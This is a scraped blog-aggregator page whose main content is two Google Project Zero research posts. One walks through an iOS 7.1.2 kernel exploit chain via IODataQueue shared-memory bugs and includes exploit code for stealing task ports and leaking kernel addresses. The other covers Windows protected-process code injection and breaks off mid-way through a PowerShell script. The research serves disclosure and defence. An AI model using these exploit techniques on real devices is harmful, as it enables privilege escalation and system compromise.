This IBM Redpaper publication focuses on best practices for installing and getting Oracle DB, z/VM, and Linux up and running on IBM LinuxONE.

Categories: Technology

In the news

iPhone J.D. - Fri, 10/19/2018 - 01:44
Apple announced yesterday that it will have a "Special Event" in Brooklyn, New York on Tuesday, October 30 at 10am EDT. Presumably, this is when Apple will announce new versions of the iPad Pro, as well as other products. The... Jeff Richardson
Categories: iPhone Web Sites


Deja-XNU
Google Project Zero - Thu, 10/18/2018 - 18:27
Posted by Ian Beer, Google Project Zero
This blog post revisits an old bug found by Pangu Team and combines it with a new, albeit very similar issue I recently found to try to build a "perfect" exploit for iOS 7.1.2.
State of the art
An idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.
So let's turn back the clock to 2014...
Pangu 7
On June 23, 2014, @PanguTeam released the Pangu 7 jailbreak for iOS 7.1-7.1.x. They exploited a lot of bugs. The issue we're interested in is CVE-2014-4461, which Apple described as: A validation issue ... in the handling of certain metadata fields of IOSharedDataQueue objects. This issue was addressed through relocation of the metadata.
(Note that this kernel bug wasn't actually fixed in iOS 8 and Pangu reused it for Pangu 8...)
Queuerious...
Looking at the iOS 8-era release notes, you'll see that Pangu and I had found some bugs in similar areas:
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.
CVE-2014-4418 : Ian Beer of Google Project Zero
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.
CVE-2014-4388 : @PanguTeam
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: An integer overflow existed in the handling of IOKit functions. This issue was addressed through improved validation of IOKit API arguments.
CVE-2014-4389 : Ian Beer of Google Project Zero
IODataQueue
I had looked at the IOKit class IODataQueue, which the header file IODataQueue.h tells us "is designed to allow kernel code to queue data to a user process." It does this by creating a lock-free queue data-structure in shared memory.
IODataQueue was quite simple, there were only two fields: dataQueue and notifyMsg:
class IODataQueue : public OSObject
{
    OSDeclareDefaultStructors(IODataQueue)

protected:
    IODataQueueMemory * dataQueue;
    void *              notifyMsg;

public:
    static IODataQueue *withCapacity(UInt32 size);
    static IODataQueue *withEntries(UInt32 numEntries, UInt32 entrySize);

    virtual Boolean initWithCapacity(UInt32 size);
    virtual Boolean initWithEntries(UInt32 numEntries, UInt32 entrySize);

    virtual Boolean enqueue(void *data, UInt32 dataSize);

    virtual void setNotificationPort(mach_port_t port);
    virtual IOMemoryDescriptor *getMemoryDescriptor();
};
Here's the entire implementation of IODataQueue, as it was around iOS 7.1.2:
OSDefineMetaClassAndStructors(IODataQueue, OSObject)
IODataQueue *IODataQueue::withCapacity(UInt32 size)
{
    IODataQueue *dataQueue = new IODataQueue;

    if (dataQueue) {
        if (!dataQueue->initWithCapacity(size)) {
            dataQueue->release();
            dataQueue = 0;
        }
    }

    return dataQueue;
}

IODataQueue *IODataQueue::withEntries(UInt32 numEntries, UInt32 entrySize)
{
    IODataQueue *dataQueue = new IODataQueue;

    if (dataQueue) {
        if (!dataQueue->initWithEntries(numEntries, entrySize)) {
            dataQueue->release();
            dataQueue = 0;
        }
    }

    return dataQueue;
}
Boolean IODataQueue::initWithCapacity(UInt32 size)
{
    vm_size_t allocSize = 0;

    if (!super::init()) {
        return false;
    }

    allocSize = round_page(size + DATA_QUEUE_MEMORY_HEADER_SIZE);

    if (allocSize < size) {
        return false;
    }

    dataQueue = (IODataQueueMemory *)IOMallocAligned(allocSize, PAGE_SIZE);
    if (dataQueue == 0) {
        return false;
    }

    dataQueue->queueSize    = size;
    dataQueue->head         = 0;
    dataQueue->tail         = 0;

    return true;
}

Boolean IODataQueue::initWithEntries(UInt32 numEntries, UInt32 entrySize)
{
    return (initWithCapacity((numEntries + 1) * (DATA_QUEUE_ENTRY_HEADER_SIZE + entrySize)));
}

void IODataQueue::free()
{
    if (dataQueue) {
        IOFreeAligned(dataQueue, round_page(dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE));
    }

    super::free();

    return;
}
Boolean IODataQueue::enqueue(void * data, UInt32 dataSize)
{
    const UInt32       head      = dataQueue->head;  // volatile
    const UInt32       tail      = dataQueue->tail;
    const UInt32       entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;
    IODataQueueEntry * entry;

    if ( tail >= head )
    {
        // Is there enough room at the end for the entry?
        if ( (tail + entrySize) <= dataQueue->queueSize )
        {
            entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);

            entry->size = dataSize;
            memcpy(&entry->data, data, dataSize);

            // The tail can be out of bound when the size of the new entry
            // exactly matches the available space at the end of the queue.
            // The tail can range from 0 to dataQueue->queueSize inclusive.

            dataQueue->tail += entrySize;
        }
        else if ( head > entrySize ) // Is there enough room at the beginning?
        {
            // Wrap around to the beginning, but do not allow the tail to catch
            // up to the head.

            dataQueue->queue->size = dataSize;

            // We need to make sure that there is enough room to set the size before
            // doing this. The user client checks for this and will look for the size
            // at the beginning if there isn't room for it at the end.

            if ( ( dataQueue->queueSize - tail ) >= DATA_QUEUE_ENTRY_HEADER_SIZE )
            {
                ((IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail))->size = dataSize;
            }

            memcpy(&dataQueue->queue->data, data, dataSize);
            dataQueue->tail = entrySize;
        }
        else
        {
            return false; // queue is full
        }
    }
    else
    {
        // Do not allow the tail to catch up to the head when the queue is full.
        // That's why the comparison uses a '>' rather than '>='.

        if ( (head - tail) > entrySize )
        {
            entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);

            entry->size = dataSize;
            memcpy(&entry->data, data, dataSize);
            dataQueue->tail += entrySize;
        }
        else
        {
            return false; // queue is full
        }
    }

    // Send notification (via mach message) that data is available.

    if ( ( head == tail )                /* queue was empty prior to enqueue() */
    ||   ( dataQueue->head == tail ) )   /* queue was emptied during enqueue() */
    {
        sendDataAvailableNotification();
    }

    return true;
}
void IODataQueue::setNotificationPort(mach_port_t port)
{
    static struct _notifyMsg init_msg = { {
        MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0),
        sizeof (struct _notifyMsg),
        MACH_PORT_NULL,
        MACH_PORT_NULL,
        0,
        0
    } };

    if (notifyMsg == 0) {
        notifyMsg = IOMalloc(sizeof(struct _notifyMsg));
    }

    *((struct _notifyMsg *)notifyMsg) = init_msg;

    ((struct _notifyMsg *)notifyMsg)->h.msgh_remote_port = port;
}

void IODataQueue::sendDataAvailableNotification()
{
    kern_return_t       kr;
    mach_msg_header_t * msgh;

    msgh = (mach_msg_header_t *)notifyMsg;
    if (msgh && msgh->msgh_remote_port) {
        kr = mach_msg_send_from_kernel_proper(msgh, msgh->msgh_size);
        switch(kr) {
            case MACH_SEND_TIMED_OUT: // Notification already sent
            case MACH_MSG_SUCCESS:
                break;
            default:
                IOLog("%s: dataAvailableNotification failed - msg_send returned: %d\n", /*getName()*/"IODataQueue", kr);
                break;
        }
    }
}
IOMemoryDescriptor *IODataQueue::getMemoryDescriptor()
{
    IOMemoryDescriptor *descriptor = 0;

    if (dataQueue != 0) {
        descriptor = IOMemoryDescriptor::withAddress(dataQueue, dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE, kIODirectionOutIn);
    }

    return descriptor;
}
The ::initWithCapacity method allocates the buffer which will end up in shared memory. We can see from the cast that the structure of the memory looks like this:
typedef struct _IODataQueueMemory {
    UInt32            queueSize;
    volatile UInt32   head;
    volatile UInt32   tail;
    IODataQueueEntry  queue[1];
} IODataQueueMemory;
The ::setNotificationPort method allocated a mach message header structure via IOMalloc when it was first called and stored the buffer as notifyMsg.
The ::enqueue method was responsible for writing data into the next free slot in the queue, potentially wrapping back around to the beginning of the buffer.
Finally, ::getMemoryDescriptor created an IOMemoryDescriptor object which wrapped the dataQueue memory to return to userspace.
IODataQueue.cpp was 243 lines, including license and comments. I count at least six bugs in it. There's only one integer overflow check, but there are multiple obvious integer overflow issues. The other problems stemmed from the fact that the only place the IODataQueue stored the queue's length was in the shared memory which userspace could modify.
This led to obvious memory corruption issues in ::enqueue, since userspace could alter the queueSize, head and tail fields and the kernel had no way to verify whether they were within the bounds of the queue buffer. The other two uses of the queueSize field also yielded interesting bugs: the ::free method has to trust the queueSize field, and so will make an oversized IOFree. Most interesting of all, however, is ::getMemoryDescriptor, which trusts queueSize when creating the IOMemoryDescriptor. If the kernel code using the IODataQueue allowed userspace to get multiple memory descriptors, this would have let us get an oversized memory descriptor, potentially giving us read/write access to other kernel heap objects.
Back to Pangu
Pangu's kernel code exec bug isn't in IODataQueue but in the subclass IOSharedDataQueue. IOSharedDataQueue.h tells us that the "IOSharedDataQueue class is designed to also allow a user process to queue data to kernel code."
IOSharedDataQueue adds one (unused) field:
    struct ExpansionData {
    };

    /*! @var reserved
        Reserved for future use.  (Internal use only) */
    ExpansionData * _reserved;

IOSharedDataQueue doesn't override the ::enqueue method, but adds a ::dequeue method to allow the kernel to dequeue objects which userspace has enqueued.
::dequeue had the same problems as ::enqueue with the queue size being in shared memory, which could lead the kernel to read out of bounds. But strangely that wasn't the only change in IOSharedDataQueue. Pangu noticed that IOSharedDataQueue also had a much more curious change in its overridden version of ::initWithCapacity:
Boolean IOSharedDataQueue::initWithCapacity(UInt32 size)
{
    IODataQueueAppendix *   appendix;

    if (!super::init()) {
        return false;
    }

    dataQueue = (IODataQueueMemory *)IOMallocAligned(round_page(size + DATA_QUEUE_MEMORY_HEADER_SIZE + DATA_QUEUE_MEMORY_APPENDIX_SIZE), PAGE_SIZE);
    if (dataQueue == 0) {
        return false;
    }

    dataQueue->queueSize = size;
    dataQueue->head = 0;
    dataQueue->tail = 0;

    appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + size + DATA_QUEUE_MEMORY_HEADER_SIZE);
    appendix->version = 0;
    notifyMsg = &(appendix->msgh);
    setNotificationPort(MACH_PORT_NULL);

    return true;
}
IOSharedDataQueue increased the size of the shared memory buffer to also add space for an IODataQueueAppendix structure:
typedef struct _IODataQueueAppendix {
    UInt32 version;
    mach_msg_header_t msgh;
} IODataQueueAppendix;
This contains a version field and, strangely, a mach message header. Then on this line:
 notifyMsg = &(appendix->msgh);
the notifyMsg member of the IODataQueue superclass is set to point in to that appendix structure.
Recall that IODataQueue allocated a mach message header structure via IOMalloc when a notification port was first set, so why did IOSharedDataQueue do it differently? About the only plausible explanation I can come up with is that a developer had noticed that the dataQueue memory allocation typically wasted almost a page of memory, because clients asked for a page-multiple number of bytes, then the queue allocation added a small header to that and rounded up to a page-multiple again. This change allowed you to save a single 0x18 byte kernel allocation per queue. Given that this change seems to have landed right around the launch date of the first iPhone, a memory constrained device with no swap, I could imagine there was a big drive to save memory.
But the question is: can you put a mach message header in shared memory like that?
What's in a message?
Here's the definition of mach_msg_header_t, as it was in iOS 7.1.2:
typedef struct {
  mach_msg_bits_t  msgh_bits;
  mach_msg_size_t  msgh_size;
  mach_port_t      msgh_remote_port;
  mach_port_t      msgh_local_port;
  mach_msg_size_t  msgh_reserved;
  mach_msg_id_t    msgh_id;
} mach_msg_header_t;
(The msgh_reserved field has since become msgh_voucher_port with the introduction of vouchers.)
Both userspace and the kernel appear at first glance to have the same definition of this structure, but upon closer inspection if you resolve all the typedefs you'll see this very important distinction:
userspace:

typedef __darwin_mach_port_t mach_port_t;
typedef __darwin_mach_port_name_t __darwin_mach_port_t;
typedef __darwin_natural_t __darwin_mach_port_name_t;
typedef unsigned int __darwin_natural_t;

kernel:

typedef ipc_port_t mach_port_t;
typedef struct ipc_port *ipc_port_t;
In userspace mach_port_t is an unsigned 32-bit integer which is a task-local name for a port, but in the kernel a mach_port_t is a raw pointer to the underlying ipc_port structure.
Since the kernel is the one responsible for initializing the notification message, and is the one sending it, it seems that the kernel is writing kernel pointers into userspace shared memory!
Fast-forward

Before we move on to writing a new exploit for that old issue let's jump forward to 2018, and why exactly I'm looking at this old code again.
I've recently spoken publicly about the importance of variant analysis, and I thought it was important to actually do some variant analysis myself before I gave that talk. By variant analysis, I mean taking a known security bug and looking for code which is vulnerable in a similar way. That could mean searching a codebase for all uses of a particular API which has exploitable edge cases, or even just searching for a buggy code snippet which has been copy/pasted into a different file.
Userspace queues and deja-xnu

This summer, while looking for variants of the old IODataQueue issues, I saw something I hadn't noticed before: as well as the facilities for enqueuing and dequeuing objects to and from kernel-owned IODataQueues, the userspace IOKit.framework also contains code for creating userspace-owned queues, for use only between userspace processes.
The code for creating these queues isn't in the open-source IOKitUser package; you can only see this functionality by reversing the IOKit framework binary.
There are no users of this code in the IOKitUser source, but some reversing showed that the userspace-only queues were used by the com.apple.iohideventsystem MIG service, implemented in IOKit.framework and hosted by backboardd on iOS and hidd on MacOS. You can talk to this service from inside the app sandbox on iOS.
Reading the userspace __IODataQueueEnqueue method, which is used to enqueue objects into both userspace and kernel queues, I had a strong feeling of deja-xnu: It was trusting the queueSize value in the queue header in shared memory, just like CVE-2014-4418 from 2014 did. Of course, if the kernel is the other end of the queue then this isn't interesting (since the kernel doesn't trust these values) but we now know that there are userspace only queues, where the other end is another userspace process.
Reading more of the userspace IODataQueue handling code I noticed that unlike the kernel IODataQueue object, the userspace one had an appendix as well as a header. And in that appendix, like IOSharedDataQueue, it stored a mach message header! Did this userspace IODataQueue have the same issue as the IOSharedDataQueue issue from Pangu 7/8? Let's look at the code:
IOReturn IODataQueueSetNotificationPort(IODataQueueMemory *dataQueue, mach_port_t notifyPort)
{
    IODataQueueAppendix * appendix = NULL;
    UInt32 queueSize = 0;

    if ( !dataQueue )
        return kIOReturnBadArgument;

    queueSize = dataQueue->queueSize;

    appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE);

    appendix->msgh.msgh_bits        = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
    appendix->msgh.msgh_size        = sizeof(appendix->msgh);
    appendix->msgh.msgh_remote_port = notifyPort;
    appendix->msgh.msgh_local_port  = MACH_PORT_NULL;
    appendix->msgh.msgh_id          = 0;

    return kIOReturnSuccess;
}
We can take a look in lldb at the contents of the buffer and see that at the end of the queue, still in shared memory, we can see a mach message header, where the name field is the remote end's name for the notification port we provided!
Exploitation of an arbitrary mach message send

In XNU each task (process) has a task port, and each thread within a task has a thread port. Originally a send right to a task's task port gave full memory and thread control, and a send right to a thread port meant full thread control (which is of course also full memory control.)
As a result of the exploits which I and others have released abusing issues with mach ports to steal port rights Apple have very slowly been hardening these interfaces. But as of iOS 11.4.1 if you have a send right to a thread port belonging to another task you can still use it to manipulate the register state of that thread.
Interestingly process startup on iOS is sufficiently deterministic that in backboardd on iOS 7.1.2 on an iPhone 4 right up to iOS 11.4.1 on an iPhone SE, 0x407 names a thread port.
Stealing ports

The msgh_local_port field in a mach message is typically used to give the recipient of a message a send-once right to a "reply port" which can be used to send a reply. This is just a convention and any send or send-once right can be transferred here. So by rewriting the mach message in shared memory so that the msgh_local_port field is 0x407 (backboardd's name for a thread port) and the msgh_bits field uses a COPY_SEND disposition for the local port, when the notification message is sent to us by backboardd we'll receive a send right to a backboardd thread port!
My exploit for this issue targets iOS 11.4.1, and contains a modified version of the remote_call code from triple_fetch to work with a stolen thread port rather than a task port.
Back to 2014

I mentioned that Apple have slowly been adding mitigations against the use of stolen task ports. The first of these mitigations I'm aware of was to prevent userspace using the kernel task port, often known as task-for-pid-0 or TFP0, which is the task port representing the kernel task (and hence allowing read/write access to kernel memory). I believe this was done in response to my mach_portal exploit which used a kernel use-after-free to steal a send right to the kernel task port.
Prior to that hardening, if you had a send right to the kernel task port you had complete read/write access to kernel memory.
We've seen that port name allocation is extremely stable, with the same name for a thread port for four years. Is the situation similar for the ipc_port pointers used in the kernel in mach messages?
Very early kernel port allocation is also deterministic. I abused this in mach_portal to steal the kernel task port by first determining the address of the host port then guessing that the kernel task port must be nearby since they're both very early port allocations.
Back in 2014 things were even easier because the kernel task port was at a fixed offset from the host port; all we need to do is leak the address of the host port then we can compute the address of the kernel task port!
Determining port addresses

IOHIDEventService is a userclient which exposes an IOSharedDataQueue to userspace. We can't open this from inside the app sandbox, but the exploit for the userspace IODataQueue bug was easy enough to backport to 32-bit iOS 7.1.2, and we can open an IOHIDEventService userclient from backboardd.
The sandbox only prevents us from actually opening the userclient connection. We can then transfer the mach port representing this connection back to our sandboxed app and continue the exploit from there. Using the code I wrote for triple_fetch we can easily use backboardd's task port which we stole (using the userspace IODataQueue bug) to open an IOKit userclient connection and move it back:
uint32_t remote_matching =
  task_remote_call(bbd_task_port,
                   IOServiceMatching,
                   1,
                   REMOTE_CSTRING("IOHIDEventService"));

uint32_t remote_service =
  task_remote_call(bbd_task_port,
                   IOServiceGetMatchingService,
                   2,
                   REMOTE_LITERAL(0),
                   REMOTE_LITERAL(remote_matching));

uint32_t remote_conn = 0;
uint32_t remote_err =
  task_remote_call(bbd_task_port,
                   IOServiceOpen,
                   4,
                   REMOTE_LITERAL(remote_service),
                   REMOTE_LITERAL(0x1307), // remote mach_task_self()
                   REMOTE_LITERAL(0),
                   REMOTE_OUT_BUFFER(&remote_conn,
                                     sizeof(remote_conn)));

mach_port_t conn =
  pull_remote_port(bbd_task_port,
                   remote_conn,
                   MACH_MSG_TYPE_COPY_SEND);
We then just need to call external method 0 to "open" the queue and IOConnectMapMemory to map the queue shared memory into our process and find the mach message header:
vm_address_t qaddr = 0;
vm_size_t qsize = 0;
IOConnectMapMemory(conn,                   0,                   mach_task_self(),                   &qaddr,                   &qsize,                   1);
mach_msg_header_t* shm_msg =
  (mach_msg_header_t*)(qaddr + qsize - 0x18);
In order to set the queue's notification port we need to call IOConnectSetNotificationPort on the userclient:
mach_port_t notification_port = MACH_PORT_NULL;
mach_port_allocate(mach_task_self(),
                   MACH_PORT_RIGHT_RECEIVE,
                   &notification_port);
uint64_t ref[8] = {0};
IOConnectSetNotificationPort(conn,
                             0,
                             notification_port,
                             ref);
We can then see the kernel address of that port's ipc_port in the shared memory message:
+0x00001010 00000013  // msgh_bits
+0x00001014 00000018  // msgh_size
+0x00001018 99a3e310  // msgh_remote_port
+0x0000101c 00000000  // msgh_local_port
+0x00001020 00000000  // msgh_reserved
+0x00001024 00000000  // msgh_id

We now need to determine the heap address of an early kernel port. If we just call IOConnectSetNotificationPort with a send right to the host_self port, we get an error:
IOConnectSetNotificationPort error: 1000000a (ipc/send) invalid port right
This error is actually from the MIG client code telling us that the MIG serialized message failed to send. IOConnectSetNotificationPort is a thin wrapper around the MIG generated io_connect_set_notification_port client code. Let's take a look in device.defs which is the source file used by MIG to generate the RPC stubs for IOKit:
routine io_connect_set_notification_port(
        connection        : io_connect_t;
    in  notification_type : uint32_t;
    in  port              : mach_port_make_send_t;
    in  reference         : uint32_t);
Here we can see that the port argument is defined as a mach_port_make_send_t which means that the MIG code will send the port argument in a port descriptor with a disposition of MACH_MSG_TYPE_MAKE_SEND, which requires the sender to hold a receive right. But in mach there is no way for the receiver to determine whether the sender held a receive right for a send right which you received or instead sent you a copy via MACH_MSG_TYPE_COPY_SEND. This means that all we need to do is modify the MIG client code to use a COPY_SEND disposition and then we can set the queue's notification port to any send right we can acquire, irrespective of whether we hold a receive right.
Doing this and passing the name we get from mach_host_self() we can learn the host port's kernel address:
host port: 0x8e30cee0
Leaking a couple of early ports which are likely to come from the same memory page and finding the greatest common factor gives us a good guess for the size of an ipc_port_t in this version of iOS:
master port: 0x8e30c690
host port:   0x8e30cee0
GCF(0x690, 0xee0) = 0x70
Looking at the XNU source we can see that the host port is allocated before the kernel task port, and since this was before the zone allocator freelist randomisation mitigation was introduced this means that the address of the kernel task port will be somewhere below the host port.
By setting the msgh_local_port field to the address of the host port - 0x70, then decrementing it by 0x70 each time we receive a notification message we will be sent a different early port each time a notification message is sent. Doing this we learn that the kernel task port is allocated 5 ports after the host port, meaning that the address of the kernel task port is host_port_kaddr - (5*0x70).
Putting it all together

You can get my exploit for iOS 7.1.2 here; I've only tested it on an iPhone 4. You'll need to use an old version of Xcode to build and run it; I'm using Xcode 7.3.1.
Launch the app, press the home button to trigger an HID notification message and enjoy read/write access to kernel memory. :)
In 2014, then, it seems that with enough OS internals knowledge and the right set of bugs it was pretty easy to build a logic bug chain to get kernel memory read/write. Things have certainly changed since then, but I'd be interested to compare this post with another one in 2022 looking back to 2018.
Lessons

Variant analysis is really important, but attackers are the only parties incentivized to do a good job of it. Why did the userspace variant of this IODataQueue issue persist for four more years after almost the exact same bug was fixed in the kernel code?
Let's also not underplay the impact that just the userspace version of the bug alone could have had. Prior to mach_portal, due to a design quirk of the com.apple.iohideventsystem MIG service, backboardd had send rights to a large number of other processes' task ports, meaning that a compromise of backboardd was also a compromise of those tasks.
Some of those tasks ran as root meaning they could have exploited the processor_set_tasks vulnerability to get the task ports for any task on the device, which despite being a known issue also wasn't fixed until I exploited it in triple_fetch.
This IODataQueue issue wasn't the only variant I found as part of this project; the deja-xnu project for iOS 11.4.1 also contains PoC code to trigger a MIG code generation bug in clients of backboardd, and the project zero tracker has details of further issues.
A final note on security bulletins

You'll notice that none of the issues I've linked above are mentioned in the iOS 12 security bulletin, despite being fixed in that release. Apple have still not assigned CVEs for these issues or publicly acknowledged that they were fixed in iOS 12. In my opinion a security bulletin should mention the security bugs that were fixed. Not doing so provides a disincentive for people to update their devices, since it appears that there were fewer security fixes than there really were.
Categories: Security

Recommendation: Hollywood Africans by Jon Batiste

iPhone J.D. - Wed, 10/17/2018 - 01:12

I don't talk about music very much on iPhone J.D., but if you are looking for something truly amazing to listen to on your iPhone and you enjoy the piano, I strongly recommend that you check out the newest album by Jon Batiste called Hollywood Africans.  Although Jon Batiste has been playing music his entire life — he comes from a big music family in New Orleans — I suspect that most folks simply know him as the bandleader on The Late Show with Stephen Colbert.  But he is far from simply a TV personality; he is a seriously talented musician, and I often find my jaw dropping as I watch him play the piano. 

Before listening to the album, I recommend that you listen to the first 20 minutes of a great recent episode of NPR's Fresh Air podcast, in which Batiste sits down at a piano with Terry Gross, plays parts of some of the songs on the album, and explains what motivated him to create this album.  Click here to listen on the NPR website, or if you use the Overcast app to listen to podcasts, here is a direct link. Using just my Apple Watch Series 4 and my AirPods, I enjoyed listening to that episode last night during an outdoor walk.  As I used my Apple Watch to listen to Jon Batiste, I remembered that he was actually featured in a 15 second ad for the Apple Watch in early 2016; the link in my In the news post from back then no longer works, but you can still watch the video on YouTube at this link.

As for the album itself, every song is great, but I'll just mention the first two.  The first song is Kenner Boogie (Apple Music link), an original piano song that will make you tap your toes and smile, all the while wondering how one person can play all of those piano keys so quickly with just two hands.  The second song is What a Wonderful World (Apple Music link), a song first recorded by Louis Armstrong in 1967.  That song has been performed and interpreted countless times, but I've never heard an arrangement anything like this.  Incredibly beautiful and moving.

I've seen Jon Batiste perform several times, and the first time I saw him was on May 1, 2005 at Jazz Fest in New Orleans, back when he was a teenager studying at Juilliard.  I only know the date because I was so impressed by his performance that I bought his first album, Times in New Orleans (Apple Music link), and my wife took the picture at the right of me doing so.  He was good back then; he is fantastic today.

Click here to listen to Hollywood Africans on Apple Music

Click here to get Hollywood Africans on Amazon

Categories: iPhone Web Sites

Injecting Code into Windows Protected Processes using COM - Part 1

Google Project Zero - Tue, 10/16/2018 - 12:34
Posted by James Forshaw, Google Project Zero
At Recon Montreal 2018 I presented “Unknown Known DLLs and other Code Integrity Trust Violations” with Alex Ionescu. We described the implementation of Microsoft Windows’ Code Integrity mechanisms and how Microsoft implemented Protected Processes (PP). As part of that I demonstrated various ways of bypassing Protected Process Light (PPL), some requiring administrator privileges, others not.
In this blog I’m going to describe the process I went through to discover a way of injecting code into a PPL on Windows 10 1803. As the only issue Microsoft considered to be violating a defended security boundary has now been fixed I can discuss the exploit in more detail.Background on Windows Protected ProcessesThe origins of the Windows Protected Process (PP) model stretch back to Vista where it was introduced to protect DRM processes. The protected process model was heavily restricted, limiting loaded DLLs to a subset of code installed with the operating system. Also for an executable to be considered eligible to be started protected it must be signed with a specific Microsoft certificate which is embedded in the binary. One protection that the kernel enforced is that a non-protected process couldn’t open a handle to a protected process with enough rights to inject arbitrary code or read memory.
In Windows 8.1 a new mechanism was introduced, Protected Process Light (PPL), which made the protection more generalized. PPL loosened some of the restrictions on what DLLs were considered valid for loading into a protected process and introduced different signing requirements for the main executable. Another big change was the introduction of a set of signing levels to separate out different types of protected processes. A PPL in one level can open for full access any process at the same signing level or below, with a restricted set of access granted to levels above. These signing levels were extended to the old PP model, a PP at one level can open all PP and PPL at the same signing level or below, however the reverse was not true, a PPL can never open a PP at any signing level for full access. Some of the levels and this relationship are shown below:
Signing levels allow Microsoft to open up protected processes to third-parties, although at the current time the only type of protected process that a third party can create is an Anti-Malware PPL. The Anti-Malware level is special as it allows the third party to add additional permitted signing keys by registering an Early Launch Anti-Malware (ELAM) certificate. There is also Microsoft’s TruePlay, which is an Anti-Cheat technology for games which uses components of PPL but it isn’t really important for this discussion.
I could spend a lot of this blog post describing how PP and PPL work under the hood, but I recommend reading the blog post series by Alex Ionescu instead (Parts 1, 2 and 3) which will do a better job. While the blog posts are primarily based on Windows 8.1, most of the concepts haven’t changed substantially in Windows 10.
I’ve written about Protected Processes before [link], in the form of the custom implementation by Oracle in their VirtualBox virtualization platform on Windows. The blog showed how I bypassed the process protection using multiple different techniques. What I didn’t mention at the time was the first technique I described, injecting JScript code into the process, also worked against Microsoft's PPL implementation. I reported that I could inject arbitrary code into a PPL to Microsoft (see Issue 1336) from an abundance of caution in case Microsoft wanted to fix it. In this case Microsoft decided it wouldn’t be fixed as a security bulletin. However Microsoft did fix the issue in the next major release on Windows (version 1803) by adding the following code to CI.DLL, the Kernel’s Code Integrity library:
UNICODE_STRING g_BlockedDllsForPPL[] = {
  // blacklist of 5 DLLs, including JSCRIPT.DLL and SCROBJ.DLL
};

NTSTATUS CipMitigatePPLBypassThroughInterpreters(PEPROCESS Process,
                                                LPBYTE Image,
                                                SIZE_T ImageSize) {
  if (!PsIsProtectedProcess(Process))
    return STATUS_SUCCESS;

  UNICODE_STRING OriginalImageName;
  // Get the original filename from the image resources.
  SIPolicyGetOriginalFilenameAndVersionFromImageBase(
      Image, ImageSize, &OriginalImageName);
  for(int i = 0; i < _countof(g_BlockedDllsForPPL); ++i) {
    if (RtlEqualUnicodeString(g_BlockedDllsForPPL[i],
                              &OriginalImageName, TRUE)) {
      return STATUS_DYNAMIC_CODE_BLOCKED;
    }
  }
  return STATUS_SUCCESS;
}
The fix checks the original file name in the resource section of the image being loaded against a blacklist of 5 DLLs. The blacklist includes DLLs such as JSCRIPT.DLL, which implements the original JScript scripting engine, and SCROBJ.DLL, which implements scriptlet objects. If the kernel detects a PP or PPL loading one of these DLLs the image load is rejected with STATUS_DYNAMIC_CODE_BLOCKED. This kills my exploit: if you modify the resource section of one of the listed DLLs the signature of the image will be invalidated, resulting in the image load failing due to a cryptographic hash mismatch. It’s actually the same fix that Oracle used to block the attack in VirtualBox, although that was implemented in user-mode.

Finding New Targets

The previous injection technique using script code was a generic technique that worked on any PPL which loaded a COM object. With the technique fixed I decided to go back and look at what executables will load as a PPL to see if they have any obvious vulnerabilities I could exploit to get arbitrary code execution. I could have chosen to go after a full PP, but PPL seemed the easier of the two and I’ve got to start somewhere. There are so many ways to inject into a PPL if we could just get administrator privileges, the least of which is just loading a kernel driver. For that reason any vulnerability I discover must work from a normal user account. Also I wanted to get the highest signing level I can get, which means PPL at Windows TCB signing level.
The first step was to identify executables which run as a protected process, this gives us the maximum attack surface to analyze for vulnerabilities. Based on the blog posts from Alex it seemed that in order to be loaded as PP or PPL the signing certificate needs a special Object Identifier (OID) in the certificate’s Enhanced Key Usage (EKU) extension. There are separate OIDs for PP and PPL; we can see this below with a comparison between WERFAULTSECURE.EXE, which can run as PP/PPL, and CSRSS.EXE, which can only run as PPL.

I decided to look for executables which have an embedded signature with these EKU OIDs and that’ll give me a list of all executables to look for exploitable behavior. I wrote the Get-EmbeddedAuthenticodeSignature cmdlet for my NtObjectManager PowerShell module to extract this information.
At this point I realized there was a problem with the approach of relying on the signing certificate: there were a lot of binaries I expected to be allowed to run as PP or PPL which were missing from the list I generated. As PP was originally designed for DRM there was no obvious executable to handle the Protected Media Path, such as AUDIODG.EXE. Also, based on my previous research into Device Guard and Windows 10S, I knew there must be an executable in the .NET framework which could run as PPL to add cached signing level information to NGEN generated binaries (NGEN is an Ahead-of-Time JIT to convert a .NET assembly into native code). The criteria for PP/PPL were more fluid than I expected. Instead of doing static analysis I decided to perform dynamic analysis: just start every executable I could enumerate as protected and query the protection level granted. I wrote the following script to test a single executable:
Import-Module NtObjectManager
function Test-ProtectedProcess {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipelineByPropertyName)]
        [string]$FullName,
        [NtApiDotNet.PsProtectedType]$ProtectedType = 0,
        [NtApiDotNet.PsProtectedSigner]$ProtectedSigner = 0
    )
    BEGIN {
        $config = New-NtProcessConfig abc -ProcessFlags ProtectedProcess `
            -ThreadFlags Suspended -TerminateOnDispose `
            -ProtectedType $ProtectedType `
            -ProtectedSigner $ProtectedSigner
    }

    PROCESS {
        $path = Get-NtFilePath $FullName
        Write-Host $path
        try {
            Use-NtObject($p = New-NtProcess $path -Config $config) {
                $prot = $p.Process.Protection
                $props = @{
